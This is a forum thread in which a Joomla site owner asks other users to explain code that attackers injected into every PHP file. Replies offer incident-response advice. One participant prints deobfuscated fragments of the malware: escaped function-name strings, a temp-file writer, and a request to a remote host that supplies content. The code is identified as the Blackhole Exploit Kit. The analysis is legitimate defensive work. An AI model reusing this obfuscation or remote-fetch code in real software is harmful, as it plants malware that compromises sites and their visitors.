HACK CODE TO BE EXPLAINED

    • #6013
      alexsp
      Participant

      Hello there to the ethical hacker community. At the start of the attached file there is code that I found in all .php files that exist on a site that was hacked. If the code seems interesting to anyone, some explanation of what the code does would be very helpful so I can secure my site.

    • #37649
      cd1zz
      Participant

      This doesn’t look malicious to me. Why do you think it is?

    • #37650
      alexsp
      Participant

      First of all thanks for the reply. I know this code is malicious because the site was hacked several times and many strange things happened, you know, like front page replacement by hackers and things like that. Secondly, because the site is built on Joomla and I can distinguish (as can everyone who has been working with Joomla) the code that exists on a normal Joomla .php page from code that was manually inserted. You can also notice this: the Joomla code starts with the Joomla credits comments (at line 2!!!).
      Can you tell what the first part of the code (the one that is not lined out well and is before the Joomla credits comments) is for? Also, as you can see, it uses code encoding and decoding, I don’t know, I can also post a normal index.php to view the difference.

    • #37651
      alexsp
      Participant

      I forgot to mention that this code has been placed in all .php pages of the site; that is not very common, don’t you think? This is actually a professional real hack and I think it is very interesting to investigate how this was done…

    • #37652
      RoleReversal
      Participant

      Alexsp,

      I’ve no experience with Joomla, so apologies if this is overly generic. If you can post what the file should be, or just outline which code is added/modified, that will help.

      However, whilst this may be a result of a compromise, I’d not expect the code you’ve found to be the first point of intrusion, as any attacker would already need a foothold on the server to be able to add/alter any of your existing source.

      I’d strongly suggest a thorough review of server logs, access, user etc. (basically the usual candidates), as well as a security audit of the code hosted on the site.

      Is this site the only web application running on the server, or is it shared? If shared, it could be that the fault doesn’t exist within your application, but a weakness on a different site has allowed a malicious user system access to modify the source code of otherwise secure web apps.

      Hope this helps.

    • #37653
      alexsp
      Participant

      I am posting an original (“clean”) index.php file of Joomla as it should normally be.
      It is obvious that this part of the code shouldn’t be there, but even if someone claims that this code is not malicious, it means that he or she understands what this code does. So please, if you will, explain it to me too.
      Andrew, I know that it is not the first point of intrusion, and I know also that Joomla has a lot of known vulnerabilities, but I see a piece of code in the files of a site and I am curious what this does and how.

    • #37654
      RoleReversal
      Participant

      Again, not a Joomla expert so I’m going blind on some things, but:

      ‘Edited’ index file includes two additional php files (helper.php & toolbar.php). Are these a legitimate part of the framework? Are they also edited? Are they required? What do they do?

      Looks like the edited file removes an authorisation call, suspicion levels rising…

      Finally, the edited index file looks like it calls a function to get a gzipped copy of the configuration file.

      From my knowledge of Joomla this could be legit (if you’re seeing it across multiple systems, any chance you’ve just upgraded Joomla?). But at worst looks like a data leakage issue, I’d still suggest focusing on locating the original compromise, this looks to be more a symptom than a cause.

      Can anyone shed any additional light?

    • #37655
      alexsp
      Participant

      I agree that it is the symptom and not the cause. I would like to say again that this code has been inserted in all php pages; the number of those is very large.
      As for the files you mentioned, Andrew, helper.php and the other one, yes these files are very common in Joomla.
      So only someone who would understand what the code does, line by line, could help right now.
      I am not sure but the first big part looks like a shell to me.

    • #37656
      RoleReversal
      Participant

      @alexsp wrote:

      I am not sure but the first big part looks like a shell to me.

      Which part? Unless I’m missing something I can’t see anything in the code you’ve uploaded that indicates a shell.

    • #37657
      hayabusa
      Participant

      While, unfortunately, I don’t have time to review code, today…

      My inkling, first, would be to set up a LAN sniffer and a test workstation, open the php from the test workstation, trace it, and see what happens…

    • #37658
      n1p
      Participant

      Initial inspection – the initial arguments are set to globals for each function, which are extremely obfuscated:


      $x1e="\x63u\162\x6c\x5f\x69\156i\x74";                     //curl_init
      $x1f="\143\165rl\137set\x6fp\x74";                        //curl_setopt
      $x20="\x63\165r\154_\x65x\x63";                           //curl_exec
      $x23="\x66\143\154\x6f\163e";                             //fclose
      $x24="f\x69l\145\x5fg\x65t\x5f\143on\164\145nt\x73";      //file_get_contents
      $x25="\146\x6f\160\145\x6e";                              //fopen
      $x26="f\x75n\x63\x74\x69\x6f\156\137\x65xi\163\x74\163";  //function_exists
      $x27="\146\167\x72i\x74\145";                             //fwrite
      $x28="\x68\145a\144\145\x72";                             //header
      $x29="\x69\156\151_\147e\164";                            //ini_get
      $x2a="\x69s_f\151\x6ce";                                  //is_file
      $x2b="\x6d\1445";                                         //md5
      $x2c="\160a\163s\x74h\162u";                              //passthru
      $x2d="strpos";                                            //strpos
      $x2e="\x73t\162t\157l\157\167er";                         //strtolower
      $x2f="\165rl\145n\x63od\x65";                             //urlencode

      It also creates a file (in my instance on the local file system, in the Temp folder) and writes to that file after making the following request:

      "http://getpronumber.com/i/rem.php?u=http://yourhost/index.php%3FDBGSESSID%3D405705822416000001%3Bd&k=054bb441428d289666e5cc9692c5420d&t=jm"

      In this instance k is the filename for the temp created file…


      function x0e($x10,$x12){
          global $x1e,$x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f;
          if ($x2a($x10)){            // if (is_file(local temp file))
              $x13=@$x25($x10,'w');   // then fopen it in 'w' mode
              @$x27($x13,$x12);       // fwrite
              @$x23($x13);            // fclose
              @$x28('Y_Out: b2s=');   // header('Y_Out: b2s=');
          }
      }

      A lot of other code there I haven’t had a chance to look at. That remote site appears down, but it is actually a forbidden index page… Suspicious?

      Given more time I could have a look, but that may help you get started… PM me if you want the real URL, as I didn’t want possibly malicious URLs in the posting….

      Apologies if not too detailed, I could only look for 10 mins!

      n1p

    • #37659
      cd1zz
      Participant

      n1p

      Which file did that come from?

    • #37660
      n1p
      Participant

      First one provided... extracted the added code in the main index.php and reformatted it.

    • #37661
      cd1zz
      Participant

      I’m an idiot – I didn’t have word wrap on. I’ll take a look now.

    • #37662
      RoleReversal
      Participant

      @cd1zz wrote:

      I’m an idiot – I didn’t have word wrap on. I’ll take a look now.

      +1, I did the same, nothing like a rookie error on a public board :'(

    • #37663
      n1p
      Participant

      Haha, it happens 😛

      Update: After more research, it turns out that it is the Blackhole Exploit Kit.

      http://malwareint.blogspot.com/2010/09/black-hole-exploits-kit-another.html
